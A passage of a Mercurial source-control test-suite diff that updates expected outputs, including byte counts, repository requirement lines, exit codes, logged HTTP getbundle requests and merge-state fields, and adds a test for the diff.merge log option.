@@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n real URL is 
http://$LOCALIP:$HGPORT/redirected (glob) s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -29,7 +29,8 @@ #if no-reposimplestore $ hg clone --stream http://localhost:$HGPORT/ copy 2>&1 streaming all changes - 9 files to transfer, 715 bytes of data + 9 files to transfer, 715 bytes of data (no-zstd !) + 9 files to transfer, 717 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) updating to branch default 4 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -348,20 +349,20 @@ list of changesets: 7f4e523d01f2cc3765ac8934da3d14db775ff872 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload sending unbundle command - sending 1040 bytes + sending 1023 bytes devel-peer-request: POST http://localhost:$HGPORT2/?cmd=unbundle - devel-peer-request: Content-length 1040 + devel-peer-request: Content-length 1023 devel-peer-request: Content-type application/mercurial-0.1 devel-peer-request: Vary X-HgArg-1,X-HgProto-1 devel-peer-request: X-hgproto-1 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull devel-peer-request: 16 bytes of commands arguments in headers - devel-peer-request: 1040 bytes of data + devel-peer-request: 1023 bytes of data devel-peer-request: finished in *.???? 
seconds (200) (glob) bundle2-input-bundle: no-transaction bundle2-input-part: "reply:changegroup" (advisory) (params: 0 advisory) supported @@ -382,6 +383,7 @@ devel-peer-request: 16 bytes of commands arguments in headers devel-peer-request: finished in *.???? seconds (200) (glob) received listkey for "phases": 15 bytes + (sent 9 HTTP requests and * bytes; received * bytes in responses) (glob) (?) $ hg rollback -q $ sed 's/.*] "/"/' < ../access.log @@ -503,7 +505,7 @@ requesting all changes remote: abort: this is an exercise abort: pull failed on remote - [255] + [100] $ cat error.log disable pull-based clones @@ -515,7 +517,7 @@ remote: abort: server has pull-based clones disabled abort: pull failed on remote (remove --pull if specified or upgrade Mercurial) - [255] + [100] #if no-reposimplestore ... but keep stream clones working diff --git a/tests/test-inherit-mode.t b/tests/test-inherit-mode.t --- a/tests/test-inherit-mode.t +++ b/tests/test-inherit-mode.t @@ -134,6 +134,8 @@ 00660 ../push/.hg/00changelog.i 00770 ../push/.hg/cache/ 00660 ../push/.hg/cache/branch2-base + 00660 ../push/.hg/cache/rbc-names-v1 + 00660 ../push/.hg/cache/rbc-revs-v1 00660 ../push/.hg/dirstate 00660 ../push/.hg/requires 00770 ../push/.hg/store/ diff --git a/tests/test-init.t b/tests/test-init.t --- a/tests/test-init.t +++ b/tests/test-init.t @@ -21,6 +21,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -59,6 +61,8 @@ $ hg --config format.usestore=false init old $ checknewrepo old generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 testonly-simplestore (reposimplestore !) sparserevlog @@ -70,6 +74,8 @@ store created 00changelog.i created generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -83,6 +89,8 @@ 00changelog.i created fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog store @@ -96,6 +104,8 @@ 00changelog.i created dotencode fncache + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 store testonly-simplestore (reposimplestore !) @@ -213,6 +223,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -233,6 +245,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -249,6 +263,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-install.t b/tests/test-install.t --- a/tests/test-install.t +++ b/tests/test-install.t @@ -184,7 +184,7 @@ $ cd $TESTTMP $ unset PYTHONPATH -#if py3 ensurepip +#if py3 ensurepip network-io $ "$PYTHON" -m venv installenv >> pip.log Hack: Debian does something a bit different in ensurepip.bootstrap. This makes @@ -197,8 +197,10 @@ Note: we use this weird path to run pip and hg to avoid platform differences, since it's bin on most platforms but Scripts on Windows. - $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log + $ ./installenv/*/pip install $TESTDIR/.. >> pip.log Failed building wheel for mercurial (?) + WARNING: You are using pip version *; however, version * is available. (glob) (?) + You should consider upgrading via the '$TESTTMP/installenv/bin/python* -m pip install --upgrade pip' command. (glob) (?) $ ./installenv/*/hg debuginstall || cat pip.log checking encoding (ascii)... checking Python executable (*) (glob) @@ -222,17 +224,17 @@ no problems detected #endif -#if virtualenv no-py3 +#if virtualenv no-py3 network-io Note: --no-site-packages is the default for all versions enabled by hghave - $ "$PYTHON" -m virtualenv --never-download installenv >> pip.log + $ "$PYTHON" -m virtualenv installenv >> pip.log DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. 
Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?) DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?) Note: we use this weird path to run pip and hg to avoid platform differences, since it's bin on most platforms but Scripts on Windows. - $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log + $ ./installenv/*/pip install $TESTDIR/.. >> pip.log DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?) DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?) DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality. (?) 
diff --git a/tests/test-largefiles-misc.t b/tests/test-largefiles-misc.t --- a/tests/test-largefiles-misc.t +++ b/tests/test-largefiles-misc.t @@ -675,6 +675,7 @@ searching for changes no changes found largefiles: no files to upload + [1] check messages when there are files to upload: diff --git a/tests/test-largefiles.t b/tests/test-largefiles.t --- a/tests/test-largefiles.t +++ b/tests/test-largefiles.t @@ -1751,7 +1751,7 @@ $ hg rm sub2/large6 $ hg up -r. abort: outstanding uncommitted merge - [255] + [20] - revert should be able to revert files introduced in a pending merge $ hg revert --all -r . diff --git a/tests/test-lfconvert.t b/tests/test-lfconvert.t --- a/tests/test-lfconvert.t +++ b/tests/test-lfconvert.t @@ -99,6 +99,8 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-lfs-largefiles.t b/tests/test-lfs-largefiles.t --- a/tests/test-lfs-largefiles.t +++ b/tests/test-lfs-largefiles.t @@ -293,6 +293,8 @@ fncache generaldelta lfs + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog store diff --git a/tests/test-lfs-serve-access.t b/tests/test-lfs-serve-access.t --- a/tests/test-lfs-serve-access.t +++ b/tests/test-lfs-serve-access.t @@ -66,7 +66,7 @@ $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob) $ rm -f $TESTTMP/access.log $TESTTMP/errors.log @@ -110,9 +110,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported 
bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 1 changesets with 1 changes to 1 files @@ -167,7 +165,7 @@ $LOCALIP - - [$LOGDATE$] "POST /missing/objects/batch HTTP/1.1" 404 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 
0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /subdir/mount/point/.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point/.hg/lfs/objects/f03217a32529a28a42d03b1244fe09b6e0f9fd06d7b966d4d50567be2abe6c0e HTTP/1.1" 200 - (glob) @@ -313,7 +311,7 @@ $ cat $TESTTMP/access.log $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 
- (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) @@ -332,7 +330,7 @@ $LOCALIP - - [$LOGDATE$] "PUT /.hg/lfs/objects/b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c HTTP/1.1" 422 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP 
- - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 500 - (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) @@ -483,7 +481,7 @@ $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 401 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST 
/.git/info/lfs/objects/batch HTTP/1.1" 401 - (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 200 - (glob) diff --git a/tests/test-lfs-serve.t b/tests/test-lfs-serve.t --- a/tests/test-lfs-serve.t +++ b/tests/test-lfs-serve.t @@ -293,7 +293,7 @@ requesting all changes remote: abort: no common changegroup version abort: pull failed on remote - [255] + [100] $ grep 'lfs' $TESTTMP/client4_pull/.hg/requires $SERVER_REQUIRES $TESTTMP/server/.hg/requires:lfs @@ -462,6 +462,7 @@ remote: adding manifests remote: adding file changes remote: added 1 changesets with 1 changes to 1 files + (sent 8 HTTP requests and * bytes; received * bytes in responses) (glob) (?) $ grep 'lfs' .hg/requires $SERVER_REQUIRES .hg/requires:lfs $TESTTMP/server/.hg/requires:lfs diff --git a/tests/test-lfs-test-server.t b/tests/test-lfs-test-server.t --- a/tests/test-lfs-test-server.t +++ b/tests/test-lfs-test-server.t @@ -17,7 +17,7 @@ #endif #if no-windows git-server - $ lfs-test-server &> lfs-server.log & + $ lfs-test-server > lfs-server.log 2>&1 & $ echo $! >> $DAEMON_PIDS #endif @@ -40,6 +40,8 @@ #endif $ cat >> $HGRCPATH <<EOF + > [ui] + > paginate=no > [experimental] > lfs.worker-enable = False > [extensions] @@ -113,7 +115,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) Date: $HTTP_DATE$ Server: testing stub value (hg-server !) lfs: processed: 31cf46fbc4ecd458a0943c5b4881f1f5a6dd36c53d6167d5b69ac45149b38e5b @@ -277,7 +279,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) Date: $HTTP_DATE$ Server: testing stub value (hg-server !) 
lfs: processed: 37a65ab78d5ecda767e8622c248b5dbff1e68b1678ab0e730d5eb8601ec8ad19 @@ -285,7 +287,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) Date: $HTTP_DATE$ Server: testing stub value (hg-server !) lfs: processed: d11e1a642b60813aee592094109b406089b8dff4cb157157f753418ec7857998 @@ -888,7 +890,7 @@ $ mkdir $TESTTMP/lfs-server2 $ cd $TESTTMP/lfs-server2 #if no-windows git-server - $ lfs-test-server &> lfs-server.log & + $ lfs-test-server > lfs-server.log 2>&1 & $ echo $! >> $DAEMON_PIDS #endif diff --git a/tests/test-log.t b/tests/test-log.t --- a/tests/test-log.t +++ b/tests/test-log.t @@ -2001,6 +2001,26 @@ @@ -0,0 +1,1 @@ +b + +Test that diff.merge is respected (file b was added on one side and +and therefore merged cleanly) + + $ hg log -pr 3 --config diff.merge=yes + changeset: 3:8e07aafe1edc + tag: tip + parent: 2:b09be438c43a + parent: 1:925d80f479bb + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: 3 + + diff -r 8e07aafe1edc a + --- a/a Thu Jan 01 00:00:00 1970 +0000 + +++ b/a Thu Jan 01 00:00:00 1970 +0000 + @@ -1,1 +1,1 @@ + -b + +c + $ cd .. 'hg log -r rev fn' when last(filelog(fn)) != rev diff --git a/tests/test-mactext.t b/tests/test-mactext.t --- a/tests/test-mactext.t +++ b/tests/test-mactext.t @@ -27,7 +27,7 @@ transaction abort! 
rollback completed abort: pretxncommit.cr hook failed - [255] + [40] $ hg cat f | f --hexdump 0000: 68 65 6c 6c 6f 0a |hello.| diff --git a/tests/test-manifest.py b/tests/test-manifest.py --- a/tests/test-manifest.py +++ b/tests/test-manifest.py @@ -6,6 +6,8 @@ import unittest import zlib +from mercurial.node import sha1nodeconstants + from mercurial import ( manifest as manifestmod, match as matchmod, @@ -436,7 +438,7 @@ class testtreemanifest(unittest.TestCase, basemanifesttests): def parsemanifest(self, text): - return manifestmod.treemanifest(b'', text) + return manifestmod.treemanifest(sha1nodeconstants, b'', text) def testWalkSubtrees(self): m = self.parsemanifest(A_DEEPER_MANIFEST) diff --git a/tests/test-merge-changedelete.t b/tests/test-merge-changedelete.t --- a/tests/test-merge-changedelete.t +++ b/tests/test-merge-changedelete.t @@ -96,17 +96,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -163,17 +166,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 
(state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -243,17 +249,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -307,17 +316,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 
5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -358,17 +370,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "r") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -405,17 +420,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 